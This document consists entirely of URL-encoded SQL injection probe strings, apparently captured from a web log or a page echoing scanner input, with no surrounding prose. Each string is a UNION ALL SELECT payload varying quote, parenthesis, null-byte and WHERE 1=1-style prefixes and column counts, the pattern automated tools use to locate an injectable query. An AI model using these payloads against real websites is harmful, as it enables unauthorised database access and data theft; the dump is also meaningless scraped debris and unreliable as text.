-8735%25%27%29%29%29%20UNION%20ALL%20SELECT%202969%2C2969%2C2969%2C2969%2C2969%2C2969%2C2969%2C2969%2C2969%2C2969%2C2969%2C2969%2C2969%2C2969%2C2969%2C2969%2C2969%2C2969%2C2969%2C2969%2C2969%2C2969%2C2969%2C2969%2C2969%2C2969%2C2969%2C2969%2C2969%2C2969%2C2969%2C2969%2C2969--%20 -3773%25%27%29%29%29%20UNION%20ALL%20SELECT%203064%2C3064%2C3064%2C3064%2C3064%2C3064%2C3064%2C3064%2C3064%2C3064%2C3064%2C3064%2C3064%2C3064%2C3064%2C3064%2C3064%2C3064%2C3064%2C3064%2C3064%2C3064%2C3064%2C3064%2C3064%2C3064%2C3064%2C3064%2C3064%2C3064%2C3064%2C3064%2C3064%2C3064--%20 -6683%25%27%29%29%29%20UNION%20ALL%20SELECT%207159%2C7159%2C7159%2C7159%2C7159%2C7159%2C7159%2C7159%2C7159%2C7159%2C7159%2C7159%2C7159%2C7159%2C7159%2C7159%2C7159%2C7159%2C7159%2C7159%2C7159%2C7159%2C7159%2C7159%2C7159%2C7159%2C7159%2C7159%2C7159%2C7159%2C7159%2C7159%2C7159%2C7159%2C7159--%20 -7450%25%27%29%29%29%20UNION%20ALL%20SELECT%209943%2C9943%2C9943%2C9943%2C9943%2C9943%2C9943%2C9943%2C9943%2C9943%2C9943%2C9943%2C9943%2C9943%2C9943%2C9943%2C9943%2C9943%2C9943%2C9943%2C9943%2C9943%2C9943%2C9943%2C9943%2C9943%2C9943%2C9943%2C9943%2C9943%2C9943%2C9943%2C9943%2C9943%2C9943%2C9943--%20 -4112%25%27%29%29%29%20UNION%20ALL%20SELECT%201098%2C1098%2C1098%2C1098%2C1098%2C1098%2C1098%2C1098%2C1098%2C1098%2C1098%2C1098%2C1098%2C1098%2C1098%2C1098%2C1098%2C1098%2C1098%2C1098%2C1098%2C1098%2C1098%2C1098%2C1098%2C1098%2C1098%2C1098%2C1098%2C1098%2C1098%2C1098%2C1098%2C1098%2C1098%2C1098%2C1098--%20 -7190%25%27%29%29%29%20UNION%20ALL%20SELECT%204655%2C4655%2C4655%2C4655%2C4655%2C4655%2C4655%2C4655%2C4655%2C4655%2C4655%2C4655%2C4655%2C4655%2C4655%2C4655%2C4655%2C4655%2C4655%2C4655%2C4655%2C4655%2C4655%2C4655%2C4655%2C4655%2C4655%2C4655%2C4655%2C4655%2C4655%2C4655%2C4655%2C4655%2C4655%2C4655%2C4655%2C4655--%20 -8388%25%27%29%29%29%20UNION%20ALL%20SELECT%209652%2C9652%2C9652%2C9652%2C9652%2C9652%2C9652%2C9652%2C9652%2C9652%2C9652%2C9652%2C9652%2C9652%2C9652%2C9652%2C9652%2C9652%2C9652%2C9652%2C9652%2C9652%2C9652%2C9652%2C9652%2C9652%2C9652%2C9652%2C9652%2C9652%2C9652%2C9652%2C9652%2C9652%2C9652%2C9652%2C9652%2C9652%2C9652--%20 -5554%25%27%29%29%29%20UNION%20ALL%20SELECT%208170%2C8170%2C8170%2C8170%2C8170%2C8170%2C8170%2C8170%2C8170%2C8170%2C8170%2C8170%2C8170%2C8170%2C8170%2C8170%2C8170%2C8170%2C8170%2C8170%2C8170%2C8170%2C8170%2C8170%2C8170%2C8170%2C8170%2C8170%2C8170%2C8170%2C8170%2C8170%2C8170%2C8170%2C8170%2C8170%2C8170%2C8170%2C8170%2C8170--%20 -9982%25%27%20UNION%20ALL%20SELECT%205811%2C5811%2C5811%2C5811%2C5811%2C5811%2C5811%2C5811%2C5811%2C5811%2C5811%2C5811%2C5811%2C5811%2C5811%2C5811%2C5811%2C5811%2C5811%2C5811%2C5811%2C5811%2C5811%2C5811%2C5811%2C5811%2C5811%2C5811%2C5811%2C5811%2C5811--%20 -3686%25%27%20UNION%20ALL%20SELECT%203275%2C3275%2C3275%2C3275%2C3275%2C3275%2C3275%2C3275%2C3275%2C3275%2C3275%2C3275%2C3275%2C3275%2C3275%2C3275%2C3275%2C3275%2C3275%2C3275%2C3275%2C3275%2C3275%2C3275%2C3275%2C3275%2C3275%2C3275%2C3275%2C3275%2C3275%2C3275--%20 -4796%25%27%20UNION%20ALL%20SELECT%205530%2C5530%2C5530%2C5530%2C5530%2C5530%2C5530%2C5530%2C5530%2C5530%2C5530%2C5530%2C5530%2C5530%2C5530%2C5530%2C5530%2C5530%2C5530%2C5530%2C5530%2C5530%2C5530%2C5530%2C5530%2C5530%2C5530%2C5530%2C5530%2C5530%2C5530%2C5530%2C5530--%20 -7467%25%27%20UNION%20ALL%20SELECT%208653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653%2C8653--%20 -1475%25%27%20UNION%20ALL%20SELECT%208182%2C8182%2C8182%2C8182%2C8182%2C8182%2C8182%2C8182%2C8182%2C8182%2C8182%2C8182%2C8182%2C8182%2C8182%2C8182%2C8182%2C8182%2C8182%2C8182%2C8182%2C8182%2C8182%2C8182%2C8182%2C8182%2C8182%2C8182%2C8182%2C8182%2C8182%2C8182%2C8182%2C8182%2C8182--%20 -4632%25%27%20UNION%20ALL%20SELECT%204347%2C4347%2C4347%2C4347%2C4347%2C4347%2C4347%2C4347%2C4347%2C4347%2C4347%2C4347%2C4347%2C4347%2C4347%2C4347%2C4347%2C4347%2C4347%2C4347%2C4347%2C4347%2C4347%2C4347%2C4347%2C4347%2C4347%2C4347%2C4347%2C4347%2C4347%2C4347%2C4347%2C4347%2C4347%2C4347--%20 -1783%25%27%20UNION%20ALL%20SELECT%204004%2C4004%2C4004%2C4004%2C4004%2C4004%2C4004%2C4004%2C4004%2C4004%2C4004%2C4004%2C4004%2C4004%2C4004%2C4004%2C4004%2C4004%2C4004%2C4004%2C4004%2C4004%2C4004%2C4004%2C4004%2C4004%2C4004%2C4004%2C4004%2C4004%2C4004%2C4004%2C4004%2C4004%2C4004%2C4004%2C4004--%20 -9583%25%27%20UNION%20ALL%20SELECT%202744%2C2744%2C2744%2C2744%2C2744%2C2744%2C2744%2C2744%2C2744%2C2744%2C2744%2C2744%2C2744%2C2744%2C2744%2C2744%2C2744%2C2744%2C2744%2C2744%2C2744%2C2744%2C2744%2C2744%2C2744%2C2744%2C2744%2C2744%2C2744%2C2744%2C2744%2C2744%2C2744%2C2744%2C2744%2C2744%2C2744%2C2744--%20 -5639%25%27%20UNION%20ALL%20SELECT%209781%2C9781%2C9781%2C9781%2C9781%2C9781%2C9781%2C9781%2C9781%2C9781%2C9781%2C9781%2C9781%2C9781%2C9781%2C9781%2C9781%2C9781%2C9781%2C9781%2C9781%2C9781%2C9781%2C9781%2C9781%2C9781%2C9781%2C9781%2C9781%2C9781%2C9781%2C9781%2C9781%2C9781%2C9781%2C9781%2C9781%2C9781%2C9781--%20 -1895%25%27%20UNION%20ALL%20SELECT%203952%2C3952%2C3952%2C3952%2C3952%2C3952%2C3952%2C3952%2C3952%2C3952%2C3952%2C3952%2C3952%2C3952%2C3952%2C3952%2C3952%2C3952%2C3952%2C3952%2C3952%2C3952%2C3952%2C3952%2C3952%2C3952%2C3952%2C3952%2C3952%2C3952%2C3952%2C3952%2C3952%2C3952%2C3952%2C3952%2C3952%2C3952%2C3952%2C3952--%20 -3983%00%27%29%20UNION%20ALL%20SELECT%205385%2C5385%2C5385%2C5385%2C5385%2C5385%2C5385%2C5385%2C5385%2C5385%2C5385%2C5385%2C5385%2C5385%2C5385%2C5385%2C5385%2C5385%2C5385%2C5385%2C5385%2C5385%2C5385%2C5385%2C5385%2C5385%2C5385%2C5385%2C5385%2C5385%2C5385--%20 -2530%00%27%29%20UNION%20ALL%20SELECT%202000%2C2000%2C2000%2C2000%2C2000%2C2000%2C2000%2C2000%2C2000%2C2000%2C2000%2C2000%2C2000%2C2000%2C2000%2C2000%2C2000%2C2000%2C2000%2C2000%2C2000%2C2000%2C2000%2C2000%2C2000%2C2000%2C2000%2C2000%2C2000%2C2000%2C2000%2C2000--%20 -4409%00%27%29%20UNION%20ALL%20SELECT%201007%2C1007%2C1007%2C1007%2C1007%2C1007%2C1007%2C1007%2C1007%2C1007%2C1007%2C1007%2C1007%2C1007%2C1007%2C1007%2C1007%2C1007%2C1007%2C1007%2C1007%2C1007%2C1007%2C1007%2C1007%2C1007%2C1007%2C1007%2C1007%2C1007%2C1007%2C1007%2C1007--%20 -4670%00%27%29%20UNION%20ALL%20SELECT%202733%2C2733%2C2733%2C2733%2C2733%2C2733%2C2733%2C2733%2C2733%2C2733%2C2733%2C2733%2C2733%2C2733%2C2733%2C2733%2C2733%2C2733%2C2733%2C2733%2C2733%2C2733%2C2733%2C2733%2C2733%2C2733%2C2733%2C2733%2C2733%2C2733%2C2733%2C2733%2C2733%2C2733--%20 -9991%00%27%29%20UNION%20ALL%20SELECT%206688%2C6688%2C6688%2C6688%2C6688%2C6688%2C6688%2C6688%2C6688%2C6688%2C6688%2C6688%2C6688%2C6688%2C6688%2C6688%2C6688%2C6688%2C6688%2C6688%2C6688%2C6688%2C6688%2C6688%2C6688%2C6688%2C6688%2C6688%2C6688%2C6688%2C6688%2C6688%2C6688%2C6688%2C6688--%20 -4581%00%27%29%20UNION%20ALL%20SELECT%206877%2C6877%2C6877%2C6877%2C6877%2C6877%2C6877%2C6877%2C6877%2C6877%2C6877%2C6877%2C6877%2C6877%2C6877%2C6877%2C6877%2C6877%2C6877%2C6877%2C6877%2C6877%2C6877%2C6877%2C6877%2C6877%2C6877%2C6877%2C6877%2C6877%2C6877%2C6877%2C6877%2C6877%2C6877%2C6877--%20 -6292%00%27%29%20UNION%20ALL%20SELECT%208795%2C8795%2C8795%2C8795%2C8795%2C8795%2C8795%2C8795%2C8795%2C8795%2C8795%2C8795%2C8795%2C8795%2C8795%2C8795%2C8795%2C8795%2C8795%2C8795%2C8795%2C8795%2C8795%2C8795%2C8795%2C8795%2C8795%2C8795%2C8795%2C8795%2C8795%2C8795%2C8795%2C8795%2C8795%2C8795%2C8795--%20 -1144%00%27%29%20UNION%20ALL%20SELECT%206000%2C6000%2C6000%2C6000%2C6000%2C6000%2C6000%2C6000%2C6000%2C6000%2C6000%2C6000%2C6000%2C6000%2C6000%2C6000%2C6000%2C6000%2C6000%2C6000%2C6000%2C6000%2C6000%2C6000%2C6000%2C6000%2C6000%2C6000%2C6000%2C6000%2C6000%2C6000%2C6000%2C6000%2C6000%2C6000%2C6000%2C6000--%20 -1490%00%27%29%20UNION%20ALL%20SELECT%202122%2C2122%2C2122%2C2122%2C2122%2C2122%2C2122%2C2122%2C2122%2C2122%2C2122%2C2122%2C2122%2C2122%2C2122%2C2122%2C2122%2C2122%2C2122%2C2122%2C2122%2C2122%2C2122%2C2122%2C2122%2C2122%2C2122%2C2122%2C2122%2C2122%2C2122%2C2122%2C2122%2C2122%2C2122%2C2122%2C2122%2C2122%2C2122--%20 -3483%00%27%29%20UNION%20ALL%20SELECT%207515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515%2C7515--%20 -9718%00%27%20UNION%20ALL%20SELECT%209371%2C9371%2C9371%2C9371%2C9371%2C9371%2C9371%2C9371%2C9371%2C9371%2C9371%2C9371%2C9371%2C9371%2C9371%2C9371%2C9371%2C9371%2C9371%2C9371%2C9371%2C9371%2C9371%2C9371%2C9371%2C9371%2C9371%2C9371%2C9371%2C9371%2C9371--%20 -2343%00%27%20UNION%20ALL%20SELECT%202540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540--%20 -2419%00%27%20UNION%20ALL%20SELECT%209351%2C9351%2C9351%2C9351%2C9351%2C9351%2C9351%2C9351%2C9351%2C9351%2C9351%2C9351%2C9351%2C9351%2C9351%2C9351%2C9351%2C9351%2C9351%2C9351%2C9351%2C9351%2C9351%2C9351%2C9351%2C9351%2C9351%2C9351%2C9351%2C9351%2C9351%2C9351%2C9351--%20 -8664%00%27%20UNION%20ALL%20SELECT%204077%2C4077%2C4077%2C4077%2C4077%2C4077%2C4077%2C4077%2C4077%2C4077%2C4077%2C4077%2C4077%2C4077%2C4077%2C4077%2C4077%2C4077%2C4077%2C4077%2C4077%2C4077%2C4077%2C4077%2C4077%2C4077%2C4077%2C4077%2C4077%2C4077%2C4077%2C4077%2C4077%2C4077--%20 -1570%00%27%20UNION%20ALL%20SELECT%204991%2C4991%2C4991%2C4991%2C4991%2C4991%2C4991%2C4991%2C4991%2C4991%2C4991%2C4991%2C4991%2C4991%2C4991%2C4991%2C4991%2C4991%2C4991%2C4991%2C4991%2C4991%2C4991%2C4991%2C4991%2C4991%2C4991%2C4991%2C4991%2C4991%2C4991%2C4991%2C4991%2C4991%2C4991--%20 -4659%00%27%20UNION%20ALL%20SELECT%203971%2C3971%2C3971%2C3971%2C3971%2C3971%2C3971%2C3971%2C3971%2C3971%2C3971%2C3971%2C3971%2C3971%2C3971%2C3971%2C3971%2C3971%2C3971%2C3971%2C3971%2C3971%2C3971%2C3971%2C3971%2C3971%2C3971%2C3971%2C3971%2C3971%2C3971%2C3971%2C3971%2C3971%2C3971%2C3971--%20 -2777%00%27%20UNION%20ALL%20SELECT%201794%2C1794%2C1794%2C1794%2C1794%2C1794%2C1794%2C1794%2C1794%2C1794%2C1794%2C1794%2C1794%2C1794%2C1794%2C1794%2C1794%2C1794%2C1794%2C1794%2C1794%2C1794%2C1794%2C1794%2C1794%2C1794%2C1794%2C1794%2C1794%2C1794%2C1794%2C1794%2C1794%2C1794%2C1794%2C1794%2C1794--%20 -8800%00%27%20UNION%20ALL%20SELECT%203475%2C3475%2C3475%2C3475%2C3475%2C3475%2C3475%2C3475%2C3475%2C3475%2C3475%2C3475%2C3475%2C3475%2C3475%2C3475%2C3475%2C3475%2C3475%2C3475%2C3475%2C3475%2C3475%2C3475%2C3475%2C3475%2C3475%2C3475%2C3475%2C3475%2C3475%2C3475%2C3475%2C3475%2C3475%2C3475%2C3475%2C3475--%20 -9591%00%27%20UNION%20ALL%20SELECT%204835%2C4835%2C4835%2C4835%2C4835%2C4835%2C4835%2C4835%2C4835%2C4835%2C4835%2C4835%2C4835%2C4835%2C4835%2C4835%2C4835%2C4835%2C4835%2C4835%2C4835%2C4835%2C4835%2C4835%2C4835%2C4835%2C4835%2C4835%2C4835%2C4835%2C4835%2C4835%2C4835%2C4835%2C4835%2C4835%2C4835%2C4835%2C4835--%20 -5971%00%27%20UNION%20ALL%20SELECT%207215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215%2C7215--%20 -2371%27%29%20WHERE%208607%3D8607%20UNION%20ALL%20SELECT%208607%2C8607%2C8607%2C8607%2C8607%2C8607%2C8607%2C8607%2C8607%2C8607%2C8607%2C8607%2C8607%2C8607%2C8607%2C8607%2C8607%2C8607%2C8607%2C8607%2C8607%2C8607%2C8607%2C8607%2C8607%2C8607%2C8607%2C8607%2C8607%2C8607%2C8607--%20 -5207%27%29%20WHERE%205036%3D5036%20UNION%20ALL%20SELECT%205036%2C5036%2C5036%2C5036%2C5036%2C5036%2C5036%2C5036%2C5036%2C5036%2C5036%2C5036%2C5036%2C5036%2C5036%2C5036%2C5036%2C5036%2C5036%2C5036%2C5036%2C5036%2C5036%2C5036%2C5036%2C5036%2C5036%2C5036%2C5036%2C5036%2C5036%2C5036--%20 -1358%27%29%20WHERE%208286%3D8286%20UNION%20ALL%20SELECT%208286%2C8286%2C8286%2C8286%2C8286%2C8286%2C8286%2C8286%2C8286%2C8286%2C8286%2C8286%2C8286%2C8286%2C8286%2C8286%2C8286%2C8286%2C8286%2C8286%2C8286%2C8286%2C8286%2C8286%2C8286%2C8286%2C8286%2C8286%2C8286%2C8286%2C8286%2C8286%2C8286--%20 -4068%27%29%20WHERE%204265%3D4265%20UNION%20ALL%20SELECT%204265%2C4265%2C4265%2C4265%2C4265%2C4265%2C4265%2C4265%2C4265%2C4265%2C4265%2C4265%2C4265%2C4265%2C4265%2C4265%2C4265%2C4265%2C4265%2C4265%2C4265%2C4265%2C4265%2C4265%2C4265%2C4265%2C4265%2C4265%2C4265%2C4265%2C4265%2C4265%2C4265%2C4265--%20 -9548%27%29%20WHERE%202502%3D2502%20UNION%20ALL%20SELECT%202502%2C2502%2C2502%2C2502%2C2502%2C2502%2C2502%2C2502%2C2502%2C2502%2C2502%2C2502%2C2502%2C2502%2C2502%2C2502%2C2502%2C2502%2C2502%2C2502%2C2502%2C2502%2C2502%2C2502%2C2502%2C2502%2C2502%2C2502%2C2502%2C2502%2C2502%2C2502%2C2502%2C2502%2C2502--%20 -5061%27%29%20WHERE%202240%3D2240%20UNION%20ALL%20SELECT%202240%2C2240%2C2240%2C2240%2C2240%2C2240%2C2240%2C2240%2C2240%2C2240%2C2240%2C2240%2C2240%2C2240%2C2240%2C2240%2C2240%2C2240%2C2240%2C2240%2C2240%2C2240%2C2240%2C2240%2C2240%2C2240%2C2240%2C2240%2C2240%2C2240%2C2240%2C2240%2C2240%2C2240%2C2240%2C2240--%20 -3329%27%29%20WHERE%203844%3D3844%20UNION%20ALL%20SELECT%203844%2C3844%2C3844%2C3844%2C3844%2C3844%2C3844%2C3844%2C3844%2C3844%2C3844%2C3844%2C3844%2C3844%2C3844%2C3844%2C3844%2C3844%2C3844%2C3844%2C3844%2C3844%2C3844%2C3844%2C3844%2C3844%2C3844%2C3844%2C3844%2C3844%2C3844%2C3844%2C3844%2C3844%2C3844%2C3844%2C3844--%20 -7392%27%29%20WHERE%209053%3D9053%20UNION%20ALL%20SELECT%209053%2C9053%2C9053%2C9053%2C9053%2C9053%2C9053%2C9053%2C9053%2C9053%2C9053%2C9053%2C9053%2C9053%2C9053%2C9053%2C9053%2C9053%2C9053%2C9053%2C9053%2C9053%2C9053%2C9053%2C9053%2C9053%2C9053%2C9053%2C9053%2C9053%2C9053%2C9053%2C9053%2C9053%2C9053%2C9053%2C9053%2C9053--%20 -5346%27%29%20WHERE%206980%3D6980%20UNION%20ALL%20SELECT%206980%2C6980%2C6980%2C6980%2C6980%2C6980%2C6980%2C6980%2C6980%2C6980%2C6980%2C6980%2C6980%2C6980%2C6980%2C6980%2C6980%2C6980%2C6980%2C6980%2C6980%2C6980%2C6980%2C6980%2C6980%2C6980%2C6980%2C6980%2C6980%2C6980%2C6980%2C6980%2C6980%2C6980%2C6980%2C6980%2C6980%2C6980%2C6980--%20 -7192%27%29%20WHERE%202206%3D2206%20UNION%20ALL%20SELECT%202206%2C2206%2C2206%2C2206%2C2206%2C2206%2C2206%2C2206%2C2206%2C2206%2C2206%2C2206%2C2206%2C2206%2C2206%2C2206%2C2206%2C2206%2C2206%2C2206%2C2206%2C2206%2C2206%2C2206%2C2206%2C2206%2C2206%2C2206%2C2206%2C2206%2C2206%2C2206%2C2206%2C2206%2C2206%2C2206%2C2206%2C2206%2C2206%2C2206--%20 -2425%22%29%20WHERE%204063%3D4063%20UNION%20ALL%20SELECT%204063%2C4063%2C4063%2C4063%2C4063%2C4063%2C4063%2C4063%2C4063%2C4063%2C4063%2C4063%2C4063%2C4063%2C4063%2C4063%2C4063%2C4063%2C4063%2C4063%2C4063%2C4063%2C4063%2C4063%2C4063%2C4063%2C4063%2C4063%2C4063%2C4063%2C4063--%20 -9418%22%29%20WHERE%202393%3D2393%20UNION%20ALL%20SELECT%202393%2C2393%2C2393%2C2393%2C2393%2C2393%2C2393%2C2393%2C2393%2C2393%2C2393%2C2393%2C2393%2C2393%2C2393%2C2393%2C2393%2C2393%2C2393%2C2393%2C2393%2C2393%2C2393%2C2393%2C2393%2C2393%2C2393%2C2393%2C2393%2C2393%2C2393%2C2393--%20 -2455%22%29%20WHERE%204330%3D4330%20UNION%20ALL%20SELECT%204330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330%2C4330--%20 -2648%22%29%20WHERE%205581%3D5581%20UNION%20ALL%20SELECT%205581%2C5581%2C5581%2C5581%2C5581%2C5581%2C5581%2C5581%2C5581%2C5581%2C5581%2C5581%2C5581%2C5581%2C5581%2C5581%2C5581%2C5581%2C5581%2C5581%2C5581%2C5581%2C5581%2C5581%2C5581%2C5581%2C5581%2C5581%2C5581%2C5581%2C5581%2C5581%2C5581%2C5581--%20 -2163%22%29%20WHERE%201414%3D1414%20UNION%20ALL%20SELECT%201414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414--%20 -8245%22%29%20WHERE%205941%3D5941%20UNION%20ALL%20SELECT%205941%2C5941%2C5941%2C5941%2C5941%2C5941%2C5941%2C5941%2C5941%2C5941%2C5941%2C5941%2C5941%2C5941%2C5941%2C5941%2C5941%2C5941%2C5941%2C5941%2C5941%2C5941%2C5941%2C5941%2C5941%2C5941%2C5941%2C5941%2C5941%2C5941%2C5941%2C5941%2C5941%2C5941%2C5941%2C5941--%20 -5450%22%29%20WHERE%203955%3D3955%20UNION%20ALL%20SELECT%203955%2C3955%2C3955%2C3955%2C3955%2C3955%2C3955%2C3955%2C3955%2C3955%2C3955%2C3955%2C3955%2C3955%2C3955%2C3955%2C3955%2C3955%2C3955%2C3955%2C3955%2C3955%2C3955%2C3955%2C3955%2C3955%2C3955%2C3955%2C3955%2C3955%2C3955%2C3955%2C3955%2C3955%2C3955%2C3955%2C3955--%20 -6188%22%29%20WHERE%202946%3D2946%20UNION%20ALL%20SELECT%202946%2C2946%2C2946%2C2946%2C2946%2C2946%2C2946%2C2946%2C2946%2C2946%2C2946%2C2946%2C2946%2C2946%2C2946%2C2946%2C2946%2C2946%2C2946%2C2946%2C2946%2C2946%2C2946%2C2946%2C2946%2C2946%2C2946%2C2946%2C2946%2C2946%2C2946%2C2946%2C2946%2C2946%2C2946%2C2946%2C2946%2C2946--%20 -3454%22%29%20WHERE%206911%3D6911%20UNION%20ALL%20SELECT%206911%2C6911%2C6911%2C6911%2C6911%2C6911%2C6911%2C6911%2C6911%2C6911%2C6911%2C6911%2C6911%2C6911%2C6911%2C6911%2C6911%2C6911%2C6911%2C6911%2C6911%2C6911%2C6911%2C6911%2C6911%2C6911%2C6911%2C6911%2C6911%2C6911%2C6911%2C6911%2C6911%2C6911%2C6911%2C6911%2C6911%2C6911%2C6911--%20 -4091%22%29%20WHERE%207366%3D7366%20UNION%20ALL%20SELECT%207366%2C7366%2C7366%2C7366%2C7366%2C7366%2C7366%2C7366%2C7366%2C7366%2C7366%2C7366%2C7366%2C7366%2C7366%2C7366%2C7366%2C7366%2C7366%2C7366%2C7366%2C7366%2C7366%2C7366%2C7366%2C7366%2C7366%2C7366%2C7366%2C7366%2C7366%2C7366%2C7366%2C7366%2C7366%2C7366%2C7366%2C7366%2C7366%2C7366--%20 -1074%29%20WHERE%206269%3D6269%20UNION%20ALL%20SELECT%206269%2C6269%2C6269%2C6269%2C6269%2C6269%2C6269%2C6269%2C6269%2C6269%2C6269%2C6269%2C6269%2C6269%2C6269%2C6269%2C6269%2C6269%2C6269%2C6269%2C6269%2C6269%2C6269%2C6269%2C6269%2C6269%2C6269%2C6269%2C6269%2C6269%2C6269--%20 -4626%29%20WHERE%205283%3D5283%20UNION%20ALL%20SELECT%205283%2C5283%2C5283%2C5283%2C5283%2C5283%2C5283%2C5283%2C5283%2C5283%2C5283%2C5283%2C5283%2C5283%2C5283%2C5283%2C5283%2C5283%2C5283%2C5283%2C5283%2C5283%2C5283%2C5283%2C5283%2C5283%2C5283%2C5283%2C5283%2C5283%2C5283%2C5283--%20 -2322%29%20WHERE%209075%3D9075%20UNION%20ALL%20SELECT%209075%2C9075%2C9075%2C9075%2C9075%2C9075%2C9075%2C9075%2C9075%2C9075%2C9075%2C9075%2C9075%2C9075%2C9075%2C9075%2C9075%2C9075%2C9075%2C9075%2C9075%2C9075%2C9075%2C9075%2C9075%2C9075%2C9075%2C9075%2C9075%2C9075%2C9075%2C9075%2C9075--%20 -4226%29%20WHERE%205472%3D5472%20UNION%20ALL%20SELECT%205472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472%2C5472--%20 -7132%29%20WHERE%202394%3D2394%20UNION%20ALL%20SELECT%202394%2C2394%2C2394%2C2394%2C2394%2C2394%2C2394%2C2394%2C2394%2C2394%2C2394%2C2394%2C2394%2C2394%2C2394%2C2394%2C2394%2C2394%2C2394%2C2394%2C2394%2C2394%2C2394%2C2394%2C2394%2C2394%2C2394%2C2394%2C2394%2C2394%2C2394%2C2394%2C2394%2C2394%2C2394--%20 -3022%29%20WHERE%209595%3D9595%20UNION%20ALL%20SELECT%209595%2C9595%2C9595%2C9595%2C9595%2C9595%2C9595%2C9595%2C9595%2C9595%2C9595%2C9595%2C9595%2C9595%2C9595%2C9595%2C9595%2C9595%2C9595%2C9595%2C9595%2C9595%2C9595%2C9595%2C9595%2C9595%2C9595%2C9595%2C9595%2C9595%2C9595%2C9595%2C9595%2C9595%2C9595%2C9595--%20 -3343%29%20WHERE%201997%3D1997%20UNION%20ALL%20SELECT%201997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997%2C1997--%20 -2454%29%20WHERE%204846%3D4846%20UNION%20ALL%20SELECT%204846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846--%20 -2919%29%20WHERE%204682%3D4682%20UNION%20ALL%20SELECT%204682%2C4682%2C4682%2C4682%2C4682%2C4682%2C4682%2C4682%2C4682%2C4682%2C4682%2C4682%2C4682%2C4682%2C4682%2C4682%2C4682%2C4682%2C4682%2C4682%2C4682%2C4682%2C4682%2C4682%2C4682%2C4682%2C4682%2C4682%2C4682%2C4682%2C4682%2C4682%2C4682%2C4682%2C4682%2C4682%2C4682%2C4682%2C4682--%20 -5409%29%20WHERE%208374%3D8374%20UNION%20ALL%20SELECT%208374%2C8374%2C8374%2C8374%2C8374%2C8374%2C8374%2C8374%2C8374%2C8374%2C8374%2C8374%2C8374%2C8374%2C8374%2C8374%2C8374%2C8374%2C8374%2C8374%2C8374%2C8374%2C8374%2C8374%2C8374%2C8374%2C8374%2C8374%2C8374%2C8374%2C8374%2C8374%2C8374%2C8374%2C8374%2C8374%2C8374%2C8374%2C8374%2C8374--%20 -5381%27%20WHERE%203416%3D3416%20UNION%20ALL%20SELECT%203416%2C3416%2C3416%2C3416%2C3416%2C3416%2C3416%2C3416%2C3416%2C3416%2C3416%2C3416%2C3416%2C3416%2C3416%2C3416%2C3416%2C3416%2C3416%2C3416%2C3416%2C3416%2C3416%2C3416%2C3416%2C3416%2C3416%2C3416%2C3416%2C3416%2C3416--%20 -7779%27%20WHERE%204474%3D4474%20UNION%20ALL%20SELECT%204474%2C4474%2C4474%2C4474%2C4474%2C4474%2C4474%2C4474%2C4474%2C4474%2C4474%2C4474%2C4474%2C4474%2C4474%2C4474%2C4474%2C4474%2C4474%2C4474%2C4474%2C4474%2C4474%2C4474%2C4474%2C4474%2C4474%2C4474%2C4474%2C4474%2C4474%2C4474--%20 -2465%27%20WHERE%204297%3D4297%20UNION%20ALL%20SELECT%204297%2C4297%2C4297%2C4297%2C4297%2C4297%2C4297%2C4297%2C4297%2C4297%2C4297%2C4297%2C4297%2C4297%2C4297%2C4297%2C4297%2C4297%2C4297%2C4297%2C4297%2C4297%2C4297%2C4297%2C4297%2C4297%2C4297%2C4297%2C4297%2C4297%2C4297%2C4297%2C4297--%20 